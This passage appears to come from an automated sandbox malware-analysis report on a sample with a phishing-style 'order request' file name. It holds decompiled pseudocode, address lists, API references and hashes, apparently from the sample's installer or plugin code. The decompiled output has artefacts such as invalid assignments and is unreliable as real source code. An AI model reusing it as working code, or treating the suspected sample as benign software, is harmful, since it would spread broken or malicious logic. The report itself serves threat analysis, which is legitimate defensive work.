                                                              										__ecx =  *(0x1000305c + __eax * 4);
                                                              										__edi = _v16 << 5;
                                                              										__edx = 0;
                                                              										__edi = (_v16 << 5) + __esi;
                                                              										__edx = 1;
                                                              										__eflags = _v8 - 0xffffffff;
                                                              										_v40 = 1;
                                                              										 *(__edi + 0x1018) = __eax;
                                                              										if(_v8 == 0xffffffff) {
                                                              											L87:
                                                              											__ecx = __edx;
                                                              											L88:
                                                              											__eflags = _v8 - __edx;
                                                              											 *(__edi + 0x1028) = __ecx;
                                                              											if(_v8 == __edx) {
                                                              												__eax =  &_v12;
                                                              												__eax = E10001A9F( &_v12);
                                                              												__eax = __eax + 1;
                                                              												__eflags = __eax;
                                                              												_v8 = __eax;
                                                              											}
                                                              											__eax = _v8;
                                                              											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                              											_t133 = _v16 + 0x81; // 0x81
                                                              											_t133 = _t133 << 5;
                                                              											__eax = 0;
                                                              											__eflags = 0;
                                                              											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                                              											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                              											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                              											goto L91;
                                                              										}
                                                              										__eflags = __ecx;
                                                              										if(__ecx > 0) {
                                                              											goto L88;
                                                              										}
                                                              										goto L87;
                                                              									case 0x16:
                                                              										_t262 =  *(_t319 + 0x1014);
                                                              										__eflags = _t262 - _v16;
                                                              										if(_t262 > _v16) {
                                                              											_v16 = _t262;
                                                              										}
                                                              										_v8 = _v8 & 0x00000000;
                                                              										_v20 = _v20 & 0x00000000;
                                                              										_v36 - 3 = _t262 - (_v36 == 3);
                                                              										if(_t262 != _v36 == 3) {
                                                              											L79:
                                                              											_v40 = 1;
                                                              										}
                                                              										goto L61;
                                                              									case 0x17:
                                                              										__eax =  &_v12;
                                                              										__eax = E10001A9F( &_v12);
                                                              										__ebx = __eax;
                                                              										__ebx = __eax + 1;
                                                              										L91:
                                                              										__eflags = __ebx;
                                                              										if(__ebx == 0) {
                                                              											goto L61;
                                                              										}
                                                              										L92:
                                                              										__eflags = _v20;
                                                              										_v40 = 1;
                                                              										if(_v20 != 0) {
                                                              											L97:
                                                              											__eflags = _v20 - 1;
                                                              											if(_v20 == 1) {
                                                              												__eax = _v16;
                                                              												__eax = _v16 << 5;
                                                              												__eflags = __eax;
                                                              												 *(__eax + __esi + 0x102c) = __ebx;
                                                              											}
                                                              											goto L99;
                                                              										}
                                                              										_v16 = _v16 << 5;
                                                              										_t141 = __esi + 0x1030; // 0x1030
                                                              										__edi = (_v16 << 5) + _t141;
                                                              										__eax =  *__edi;
                                                              										__eflags = __eax - 0xffffffff;
                                                              										if(__eax <= 0xffffffff) {
                                                              											L95:
                                                              											__eax = GlobalFree(__eax);
                                                              											L96:
                                                              											 *__edi = __ebx;
                                                              											goto L97;
                                                              										}
                                                              										__eflags = __eax - 0x19;
                                                              										if(__eax <= 0x19) {
                                                              											goto L96;
                                                              										}
                                                              										goto L95;
                                                              									case 0x18:
                                                              										goto L61;
                                                              								}
                                                              							}
                                                              							_t263 = _t259 - 1;
                                                              							__eflags = _t263;
                                                              							if(_t263 == 0) {
                                                              								_v16 = _t284;
                                                              								goto L74;
                                                              							}
                                                              							__eflags = _t263 != 1;
                                                              							if(_t263 != 1) {
                                                              								goto L141;
                                                              							}
                                                              							_t266 = _t287 - 0x21;
                                                              							__eflags = _t266;
                                                              							if(_t266 == 0) {
                                                              								_v8 =  ~_v8;
                                                              								goto L61;
                                                              							}
                                                              							_t267 = _t266 - 0x42;
                                                              							__eflags = _t267;
                                                              							if(_t267 == 0) {
                                                              								L57:
                                                              								__eflags = _v8 - 1;
                                                              								if(_v8 != 1) {
                                                              									_t92 = _t319 + 0x1010;
                                                              									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
                                                              									__eflags =  *_t92;
                                                              								} else {
                                                              									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
                                                              								}
                                                              								_v8 = 1;
                                                              								goto L61;
                                                              							}
                                                              							_t272 = _t267;
                                                              							__eflags = _t272;
                                                              							if(_t272 == 0) {
                                                              								_push(0x20);
                                                              								L56:
                                                              								_pop(1);
                                                              								goto L57;
                                                              							}
                                                              							_t273 = _t272 - 9;
                                                              							__eflags = _t273;
                                                              							if(_t273 == 0) {
                                                              								_push(8);
                                                              								goto L56;
                                                              							}
                                                              							_t274 = _t273 - 4;
                                                              							__eflags = _t274;
                                                              							if(_t274 == 0) {
                                                              								_push(4);
                                                              								goto L56;
                                                              							}
                                                              							_t275 = _t274 - 1;
                                                              							__eflags = _t275;
                                                              							if(_t275 == 0) {
                                                              								_push(0x10);
                                                              								goto L56;
                                                              							}
                                                              							__eflags = _t275 != 0;
                                                              							if(_t275 != 0) {
                                                              								goto L61;
                                                              							}
                                                              							_push(0x40);
                                                              							goto L56;
                                                              						}
                                                              						goto L15;
                                                              					}
                                                              					_t278 = _t249 - 5;
                                                              					if(_t278 == 0) {
                                                              						__eflags = _v36 - 3;
                                                              						_v32 = 1;
                                                              						_v8 = _t284;
                                                              						_v20 = _t284;
                                                              						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                              						_v40 = _t284;
                                                              						goto L17;
                                                              					}
                                                              					_t282 = _t278 - 1;
                                                              					if(_t282 == 0) {
                                                              						_v32 = 2;
                                                              						_v8 = _t284;
                                                              						_v20 = _t284;
                                                              						goto L17;
                                                              					}
                                                              					if(_t282 != 0x16) {
                                                              						goto L40;
                                                              					} else {
                                                              						_v32 = 3;
                                                              						_v8 = 1;
                                                              						goto L17;
                                                              					}
                                                              				}
                                                              				GlobalFree(_v52);
                                                              				GlobalFree(_v24);
                                                              				GlobalFree(_v44);
                                                              				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
                                                              					L161:
                                                              					return _t319;
                                                              				} else {
                                                              					_t216 =  *_t319 - 1;
                                                              					if(_t216 == 0) {
                                                              						_t178 = _t319 + 8; // 0x8
                                                              						_t312 = _t178;
                                                              						__eflags =  *_t312 - _t284;
                                                              						if( *_t312 != _t284) {
                                                              							_t217 = GetModuleHandleW(_t312);
                                                              							__eflags = _t217 - _t284;
                                                              							 *(_t319 + 0x1008) = _t217;
                                                              							if(_t217 != _t284) {
                                                              								L150:
                                                              								_t183 = _t319 + 0x808; // 0x808
                                                              								_t313 = _t183;
                                                              								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
                                                              								__eflags = _t218 - _t284;
                                                              								 *(_t319 + 0x100c) = _t218;
                                                              								if(_t218 == _t284) {
                                                              									__eflags =  *_t313 - 0x23;
                                                              									if( *_t313 == 0x23) {
                                                              										_t186 = _t319 + 0x80a; // 0x80a
                                                              										_t222 = E10001311(_t186);
                                                              										__eflags = _t222 - _t284;
                                                              										if(_t222 != _t284) {
                                                              											__eflags = _t222 & 0xffff0000;
                                                              											if((_t222 & 0xffff0000) == 0) {
                                                              												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								__eflags = _v48 - _t284;
                                                              								if(_v48 != _t284) {
                                                              									L157:
                                                              									_t313[lstrlenW(_t313)] = 0x57;
                                                              									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
                                                              									__eflags = _t220 - _t284;
                                                              									if(_t220 != _t284) {
                                                              										L145:
                                                              										 *(_t319 + 0x100c) = _t220;
                                                              										goto L161;
                                                              									}
                                                              									__eflags =  *(_t319 + 0x100c) - _t284;
                                                              									L159:
                                                              									if(__eflags != 0) {
                                                              										goto L161;
                                                              									}
                                                              									L160:
                                                              									_t197 = _t319 + 4;
                                                              									 *_t197 =  *(_t319 + 4) | 0xffffffff;
                                                              									__eflags =  *_t197;
                                                              									goto L161;
                                                              								} else {
                                                              									__eflags =  *(_t319 + 0x100c) - _t284;
                                                              									if( *(_t319 + 0x100c) != _t284) {
                                                              										goto L161;
                                                              									}
                                                              									goto L157;
                                                              								}
                                                              							}
                                                              							_t225 = LoadLibraryW(_t312);
                                                              							__eflags = _t225 - _t284;
                                                              							 *(_t319 + 0x1008) = _t225;
                                                              							if(_t225 == _t284) {
                                                              								goto L160;
                                                              							}
                                                              							goto L150;
                                                              						}
                                                              						_t179 = _t319 + 0x808; // 0x808
                                                              						_t227 = E10001311(_t179);
                                                              						 *(_t319 + 0x100c) = _t227;
                                                              						__eflags = _t227 - _t284;
                                                              						goto L159;
                                                              					}
                                                              					_t228 = _t216 - 1;
                                                              					if(_t228 == 0) {
                                                              						_t176 = _t319 + 0x808; // 0x808
                                                              						_t229 = _t176;
                                                              						__eflags =  *_t229 - _t284;
                                                              						if( *_t229 == _t284) {
                                                              							goto L161;
                                                              						}
                                                              						_t220 = E10001311(_t229);
                                                              						L144:
                                                              						goto L145;
                                                              					}
                                                              					if(_t228 != 1) {
                                                              						goto L161;
                                                              					}
                                                              					_t80 = _t319 + 8; // 0x8
                                                              					_t285 = _t80;
                                                              					_t314 = E10001311(_t80);
                                                              					 *(_t319 + 0x1008) = _t314;
                                                              					if(_t314 == 0) {
                                                              						goto L160;
                                                              					}
                                                              					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
                                                              					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
                                                              					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
                                                              					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
                                                              					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
                                                              					_t89 = _t319 + 0x808; // 0x808
                                                              					_t220 =  *(_t314->i + E10001311(_t89) * 4);
                                                              					goto L144;
                                                              				}
                                                              			}
































































                                                              0x10001b20
                                                              0x10001b23
                                                              0x10001b26
                                                              0x10001b29
                                                              0x10001b2c
                                                              0x10001b2f
                                                              0x10001b32
                                                              0x10001b34
                                                              0x10001b37
                                                              0x10001b3c
                                                              0x10001b3f
                                                              0x10001b47
                                                              0x10001b4f
                                                              0x10001b51
                                                              0x10001b54
                                                              0x10001b5c
                                                              0x10001b5c
                                                              0x10001b61
                                                              0x10001b64
                                                              0x00000000
                                                              0x00000000
                                                              0x10001b6e
                                                              0x10001b71
                                                              0x10001b76
                                                              0x10001b78
                                                              0x10001beb
                                                              0x10001beb
                                                              0x10001beb
                                                              0x10001bef
                                                              0x10001bf2
                                                              0x10001bf4
                                                              0x10001c16
                                                              0x10001c18
                                                              0x10001c1b
                                                              0x10001c24
                                                              0x10001c2a
                                                              0x10001c2c
                                                              0x10001c32
                                                              0x10001c32
                                                              0x10001c38
                                                              0x10001c3b
                                                              0x10001c3b
                                                              0x10001c3e
                                                              0x10001c3e
                                                              0x10001c44
                                                              0x10001c46
                                                              0x10001c46
                                                              0x10001c48
                                                              0x10001c4b
                                                              0x10001c4e
                                                              0x10001c54
                                                              0x10001c5a
                                                              0x10001c5d
                                                              0x10001c81
                                                              0x10001c84
                                                              0x00000000
                                                              0x00000000
                                                              0x10001c87
                                                              0x10001c89
                                                              0x10001c97
                                                              0x10001c9a
                                                              0x10001c9c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10001c9e
                                                              0x10001c9e
                                                              0x10001c9e
                                                              0x10001ca4
                                                              0x10001ca6
                                                              0x00000000
                                                              0x00000000
                                                              0x10001ca8
                                                              0x10001caa
                                                              0x10001cac
                                                              0x10001cae
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10001cae
                                                              0x10001cb0
                                                              0x10001cb2
                                                              0x10001cb4
                                                              0x10001cb4
                                                              0x10001cba
                                                              0x10001cc0
                                                              0x10001cc2
                                                              0x10001cd6
                                                              0x10001cd6
                                                              0x10001cd8
                                                              0x10001cc4
                                                              0x10001cca
                                                              0x10001ccd
                                                              0x10001ccd
                                                              0x00000000
                                                              0x10001c5f
                                                              0x10001c5f
                                                              0x10001c5f
                                                              0x10001c60
                                                              0x10001c68
                                                              0x10001c6c
                                                              0x10001c72
                                                              0x10001c76
                                                              0x10001cde
                                                              0x10001ce1
                                                              0x10001ce5
                                                              0x10001d70
                                                              0x10001d74
                                                              0x10001b59
                                                              0x00000000
                                                              0x10001b59
                                                              0x00000000
                                                              0x10001d74
                                                              0x10001c62
                                                              0x10001c62
                                                              0x10001c63
                                                              0x00000000
                                                              0x00000000
                                                              0x10001c65
                                                              0x10001c66
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10001c66
                                                              0x10001c5d
                                                              0x10001bf7
                                                              0x00000000
                                                              0x00000000
                                                              0x10001c00
                                                              0x10001c03
                                                              0x10001c10
                                                              0x10001c10
                                                              0x10001c05
                                                              0x00000000
                                                              0x10001c05
                                                              0x10001b7a
                                                              0x10001b7d
                                                              0x10001bce
                                                              0x10001bd1
                                                              0x10001be3
                                                              0x10001be3
                                                              0x10001be6
                                                              0x00000000
                                                              0x10001be6
                                                              0x10001bd3
                                                              0x10001bd8
                                                              0x00000000
                                                              0x00000000
                                                              0x10001bda
                                                              0x10001bdd
                                                              0x10001ced
                                                              0x10001cf0
                                                              0x10001cf0
                                                              0x10001cf2
                                                              0x10002048
                                                              0x1000204b
                                                              0x100020b2
                                                              0x10001d60
                                                              0x10001d63
                                                              0x10001d66
                                                              0x10001d69
                                                              0x10001d69
                                                              0x10001d6b
                                                              0x10001d6c
                                                              0x10001d6c
                                                              0x10001d6d
                                                              0x00000000
                                                              0x10001d6d
                                                              0x1000204d
                                                              0x10002050
                                                              0x10002057
                                                              0x10002057
                                                              0x1000205b
                                                              0x1000206f
                                                              0x1000206f
                                                              0x10002072
                                                              0x10002076
                                                              0x100020be
                                                              0x100020c1
                                                              0x100020c5
                                                              0x00000000
                                                              0x100020c5
                                                              0x10002078
                                                              0x1000207c
                                                              0x00000000
                                                              0x00000000
                                                              0x1000207e
                                                              0x10002085
                                                              0x10002085
                                                              0x1000208b
                                                              0x1000208e
                                                              0x100020aa
                                                              0x10002090
                                                              0x10002099
                                                              0x1000209c
                                                              0x1000209c
                                                              0x00000000
                                                              0x1000208e
                                                              0x1000205d
                                                              0x10002060
                                                              0x10002064
                                                              0x00000000
                                                              0x00000000
                                                              0x10002066
                                                              0x00000000
                                                              0x10002066
                                                              0x10002052
                                                              0x10002055
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10002055
                                                              0x10001cf8
                                                              0x10001cf8
                                                              0x10001cf9
                                                              0x10001e29
                                                              0x10001e29
                                                              0x10001e2e
                                                              0x10001e31
                                                              0x00000000
                                                              0x00000000
                                                              0x10001e3e
                                                              0x00000000
                                                              0x10001fe5
                                                              0x10001fe8
                                                              0x10001feb
                                                              0x10001feb
                                                              0x10001fec
                                                              0x10001fed
                                                              0x10001ff0
                                                              0x10001ff3
                                                              0x10001ff6
                                                              0x00000000
                                                              0x00000000
                                                              0x10001ff8
                                                              0x10001ff8
                                                              0x10001ffc
                                                              0x10002014
                                                              0x10002017
                                                              0x10002021
                                                              0x00000000
                                                              0x10002021
                                                              0x10001ffe
                                                              0x10001ffe
                                                              0x10002001
                                                              0x00000000
                                                              0x00000000
                                                              0x10002003
                                                              0x10002006
                                                              0x10002008
                                                              0x10002009
                                                              0x10002009
                                                              0x10002009
                                                              0x1000200a
                                                              0x1000200d
                                                              0x10002010
                                                              0x10002011
                                                              0x10001feb
                                                              0x10001fec
                                                              0x10001fed
                                                              0x10001ff0
                                                              0x10001ff3
                                                              0x10001ff6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10001ff6
                                                              0x00000000
                                                              0x10001e85
                                                              0x00000000
                                                              0x00000000
                                                              0x10001e91
                                                              0x00000000
                                                              0x00000000
                                                              0x10001e78
                                                              0x10001e7c
                                                              0x10001e80
                                                              0x00000000
                                                              0x00000000
                                                              0x10001fb6
                                                              0x10001fba
                                                              0x00000000
                                                              0x00000000
                                                              0x10001fc0
                                                              0x10001fc9
                                                              0x10001fd0
                                                              0x10001fd8
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f53
                                                              0x10001f53
                                                              0x00000000
                                                              0x00000000
                                                              0x10001e9a
                                                              0x00000000
                                                              0x00000000
                                                              0x10002040
                                                              0x00000000
                                                              0x00000000
                                                              0x10002030
                                                              0x00000000
                                                              0x00000000
                                                              0x10002034
                                                              0x00000000
                                                              0x00000000
                                                              0x1000203c
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f76
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f5b
                                                              0x10001f5d
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f7e
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f63
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f67
                                                              0x00000000
                                                              0x00000000
                                                              0x10002038
                                                              0x10002042
                                                              0x10002042
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f86
                                                              0x10001f8a
                                                              0x10001f8f
                                                              0x10001f92
                                                              0x10001f93
                                                              0x10001f96
                                                              0x10001f9c
                                                              0x10001f9c
                                                              0x00000000
                                                              0x00000000
                                                              0x10002028
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f6b
                                                              0x10001f6e
                                                              0x10001f70
                                                              0x00000000
                                                              0x00000000
                                                              0x10001ea1
                                                              0x10001ea1
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f7a
                                                              0x10001f80
                                                              0x10001f80
                                                              0x10001ea3
                                                              0x10001ea3
                                                              0x10001ea6
                                                              0x10001ead
                                                              0x10001eb0
                                                              0x10001eb2
                                                              0x10001eb4
                                                              0x10001eb5
                                                              0x10001eb9
                                                              0x10001ebc
                                                              0x10001ec2
                                                              0x10001ec8
                                                              0x10001ec8
                                                              0x10001eca
                                                              0x10001eca
                                                              0x10001ecd
                                                              0x10001ed3
                                                              0x10001ed5
                                                              0x10001ed9
                                                              0x10001ede
                                                              0x10001ede
                                                              0x10001ee0
                                                              0x10001ee0
                                                              0x10001ee3
                                                              0x10001ee6
                                                              0x10001eef
                                                              0x10001ef5
                                                              0x10001ef8
                                                              0x10001ef8
                                                              0x10001efa
                                                              0x10001efd
                                                              0x10001f03
                                                              0x00000000
                                                              0x10001f03
                                                              0x10001ec4
                                                              0x10001ec6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10001e45
                                                              0x10001e4b
                                                              0x10001e4e
                                                              0x10001e50
                                                              0x10001e50
                                                              0x10001e53
                                                              0x10001e57
                                                              0x10001e64
                                                              0x10001e66
                                                              0x10001e6c
                                                              0x10001e6c
                                                              0x10001e6c
                                                              0x00000000
                                                              0x00000000
                                                              0x10001fa4
                                                              0x10001fa8
                                                              0x10001fad
                                                              0x10001fb0
                                                              0x10001f09
                                                              0x10001f09
                                                              0x10001f0b
                                                              0x00000000
                                                              0x00000000
                                                              0x10001f11
                                                              0x10001f11
                                                              0x10001f15
                                                              0x10001f1c
                                                              0x10001f40
                                                              0x10001f40
                                                              0x10001f44
                                                              0x10001f46
                                                              0x10001f49
                                                              0x10001f49
                                                              0x10001f4c
                                                              0x10001f4c
                                                              0x00000000
                                                              0x10001f44
                                                              0x10001f21
                                                              0x10001f24
                                                              0x10001f24
                                                              0x10001f2b
                                                              0x10001f2d
                                                              0x10001f30
                                                              0x10001f37
                                                              0x10001f38
                                                              0x10001f3e
                                                              0x10001f3e
                                                              0x00000000
                                                              0x10001f3e
                                                              0x10001f32
                                                              0x10001f35
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10001e3e
                                                              0x10001cff
                                                              0x10001cff
                                                              0x10001d00
                                                              0x10001e26
                                                              0x00000000
                                                              0x10001e26
                                                              0x10001d06
                                                              0x10001d07
                                                              0x00000000
                                                              0x00000000
                                                              0x10001d0f
                                                              0x10001d0f
                                                              0x10001d12
                                                              0x10001d5d
                                                              0x00000000
                                                              0x10001d5d
                                                              0x10001d14
                                                              0x10001d14
                                                              0x10001d17
                                                              0x10001d41
                                                              0x10001d44
                                                              0x10001d47
                                                              0x10001e18
                                                              0x10001e18
                                                              0x10001e18
                                                              0x10001d4d
                                                              0x10001d4d
                                                              0x10001d4d
                                                              0x10001e1e
                                                              0x00000000
                                                              0x10001e1e
                                                              0x10001d1a
                                                              0x10001d1a
                                                              0x10001d1b
                                                              0x10001d3e
                                                              0x10001d40
                                                              0x10001d40
                                                              0x00000000
                                                              0x10001d40
                                                              0x10001d1d
                                                              0x10001d1d
                                                              0x10001d20
                                                              0x10001d3a
                                                              0x00000000
                                                              0x10001d3a
                                                              0x10001d22
                                                              0x10001d22
                                                              0x10001d25
                                                              0x10001d36
                                                              0x00000000
                                                              0x10001d36
                                                              0x10001d27
                                                              0x10001d27
                                                              0x10001d28
                                                              0x10001d32
                                                              0x00000000
                                                              0x10001d32
                                                              0x10001d2b
                                                              0x10001d2c
                                                              0x00000000
                                                              0x00000000
                                                              0x10001d2e
                                                              0x00000000
                                                              0x10001d2e
                                                              0x00000000
                                                              0x10001bdd
                                                              0x10001b7f
                                                              0x10001b82
                                                              0x10001bb1
                                                              0x10001bb5
                                                              0x10001bbc
                                                              0x10001bc3
                                                              0x10001bc6
                                                              0x10001bc9
                                                              0x00000000
                                                              0x10001bc9
                                                              0x10001b84
                                                              0x10001b85
                                                              0x10001ba0
                                                              0x10001ba7
                                                              0x10001baa
                                                              0x00000000
                                                              0x10001baa
                                                              0x10001b8a
                                                              0x00000000
                                                              0x10001b90
                                                              0x10001b90
                                                              0x10001b97
                                                              0x00000000
                                                              0x10001b97
                                                              0x10001b8a
                                                              0x10001d83
                                                              0x10001d88
                                                              0x10001d8d
                                                              0x10001d91
                                                              0x100021c5
                                                              0x100021cb
                                                              0x10001da3
                                                              0x10001da5
                                                              0x10001da6
                                                              0x100020ee
                                                              0x100020ee
                                                              0x100020f1
                                                              0x100020f4
                                                              0x10002111
                                                              0x10002117
                                                              0x10002119
                                                              0x1000211f
                                                              0x10002136
                                                              0x10002136
                                                              0x10002136
                                                              0x10002143
                                                              0x10002149
                                                              0x1000214c
                                                              0x10002152
                                                              0x10002154
                                                              0x10002158
                                                              0x1000215a
                                                              0x10002161
                                                              0x10002166
                                                              0x10002169
                                                              0x1000216b
                                                              0x10002170
                                                              0x10002182
                                                              0x10002182
                                                              0x10002170
                                                              0x10002169
                                                              0x10002158
                                                              0x10002188
                                                              0x1000218b
                                                              0x10002195
                                                              0x1000219d
                                                              0x100021aa
                                                              0x100021b0
                                                              0x100021b3
                                                              0x100020e3
                                                              0x100020e3
                                                              0x00000000
                                                              0x100020e3
                                                              0x100021b9
                                                              0x100021bf
                                                              0x100021bf
                                                              0x00000000
                                                              0x00000000
                                                              0x100021c1
                                                              0x100021c1
                                                              0x100021c1
                                                              0x100021c1
                                                              0x00000000
                                                              0x1000218d
                                                              0x1000218d
                                                              0x10002193
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10002193
                                                              0x1000218b
                                                              0x10002122
                                                              0x10002128
                                                              0x1000212a
                                                              0x10002130
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x10002130
                                                              0x100020f6
                                                              0x100020fd
                                                              0x10002103
                                                              0x10002109
                                                              0x00000000
                                                              0x10002109
                                                              0x10001dac
                                                              0x10001dad
                                                              0x100020cd
                                                              0x100020cd
                                                              0x100020d3
                                                              0x100020d6
                                                              0x00000000
                                                              0x00000000
                                                              0x100020dd
                                                              0x100020e2
                                                              0x00000000
                                                              0x100020e2
                                                              0x10001db4
                                                              0x00000000
                                                              0x00000000
                                                              0x10001dba
                                                              0x10001dba
                                                              0x10001dc3
                                                              0x10001dc8
                                                              0x10001dce
                                                              0x00000000
                                                              0x00000000
                                                              0x10001dd4
                                                              0x10001de1
                                                              0x10001de7
                                                              0x10001df1
                                                              0x10001df7
                                                              0x10001dff
                                                              0x10001e0f
                                                              0x00000000
                                                              0x10001e0f

                                                              APIs
                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                              • GlobalFree.KERNEL32(?), ref: 10001D83
                                                              • GlobalFree.KERNEL32(?), ref: 10001D88
                                                              • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                              • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$lstrcpy$Alloc
                                                              • String ID:
                                                              • API String ID: 4227406936-0
                                                              • Opcode ID: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
                                                              • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                              • Opcode Fuzzy Hash: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
                                                              • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 630 406054-40605f 631 406061-406070 630->631 632 406072-406088 630->632 631->632 633 4062a0-4062a6 632->633 634 40608e-40609b 632->634 636 4062ac-4062b7 633->636 637 4060ad-4060ba 633->637 634->633 635 4060a1-4060a8 634->635 635->633 639 4062c2-4062c3 636->639 640 4062b9-4062bd call 406032 636->640 637->636 638 4060c0-4060cc 637->638 642 4060d2-40610e 638->642 643 40628d 638->643 640->639 644 406114-40611f GetVersion 642->644 645 40622e-406232 642->645 646 40629b-40629e 643->646 647 40628f-406299 643->647 648 406121-406125 644->648 649 406139 644->649 650 406234-406238 645->650 651 406267-40626b 645->651 646->633 647->633 648->649 655 406127-40612b 648->655 652 406140-406147 649->652 656 406248-406255 call 406032 650->656 657 40623a-406246 call 405f79 650->657 653 40627a-40628b lstrlenW 651->653 654 40626d-406275 call 406054 651->654 659 406149-40614b 652->659 660 40614c-40614e 652->660 653->633 654->653 655->649 663 40612d-406131 655->663 667 40625a-406263 656->667 657->667 659->660 665 406150-40616d call 405eff 660->665 666 40618a-40618d 660->666 663->649 668 406133-406137 663->668 673 406172-406176 665->673 671 40619d-4061a0 666->671 672 40618f-40619b GetSystemDirectoryW 666->672 667->653 670 406265 667->670 668->652 674 406226-40622c call 4062c6 670->674 676 4061a2-4061b0 GetWindowsDirectoryW 671->676 677 40620b-40620d 671->677 675 40620f-406213 672->675 678 406215-406219 673->678 679 40617c-406185 call 406054 673->679 674->653 675->674 675->678 676->677 677->675 680 4061b2-4061bc 677->680 678->674 683 40621b-406221 lstrcatW 678->683 679->675 685 4061d6-4061ec SHGetSpecialFolderLocation 680->685 686 4061be-4061c1 680->686 683->674 688 406207 685->688 689 4061ee-406205 SHGetPathFromIDListW CoTaskMemFree 685->689 686->685 687 4061c3-4061ca 686->687 691 4061d2-4061d4 687->691 688->677 689->675 689->688 691->675 691->685
                                                              C-Code - Quality: 74%
                                                              			E00406054(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                              				intOrPtr* _v8;
                                                              				struct _ITEMIDLIST* _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _t48;
                                                              				WCHAR* _t49;
                                                              				signed char _t51;
                                                              				signed int _t52;
                                                              				signed int _t53;
                                                              				signed int _t54;
                                                              				short _t66;
                                                              				short _t67;
                                                              				short _t69;
                                                              				short _t71;
                                                              				void* _t81;
                                                              				signed int _t85;
                                                              				intOrPtr* _t89;
                                                              				signed char _t90;
                                                              				intOrPtr _t93;
                                                              				void* _t98;
                                                              				void* _t108;
                                                              				short _t109;
                                                              				signed int _t112;
                                                              				void* _t113;
                                                              				WCHAR* _t114;
                                                              				void* _t116;
                                                              
                                                              				_t113 = __esi;
                                                              				_t108 = __edi;
                                                              				_t81 = __ebx;
                                                              				_t48 = _a8;
                                                              				if(_t48 < 0) {
                                                              					_t93 =  *0x7a7a1c; // 0x9ae6de
                                                              					_t48 =  *(_t93 - 4 + _t48 * 4);
                                                              				}
                                                              				_push(_t81);
                                                              				_push(_t113);
                                                              				_push(_t108);
                                                              				_t89 =  *0x7a8a78 + _t48 * 2;
                                                              				_t49 = 0x7a69e0;
                                                              				_t114 = 0x7a69e0;
                                                              				if(_a4 >= 0x7a69e0 && _a4 - 0x7a69e0 >> 1 < 0x800) {
                                                              					_t114 = _a4;
                                                              					_a4 = _a4 & 0x00000000;
                                                              				}
                                                              				while(1) {
                                                              					_t109 =  *_t89;
                                                              					if(_t109 == 0) {
                                                              						break;
                                                              					}
                                                              					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
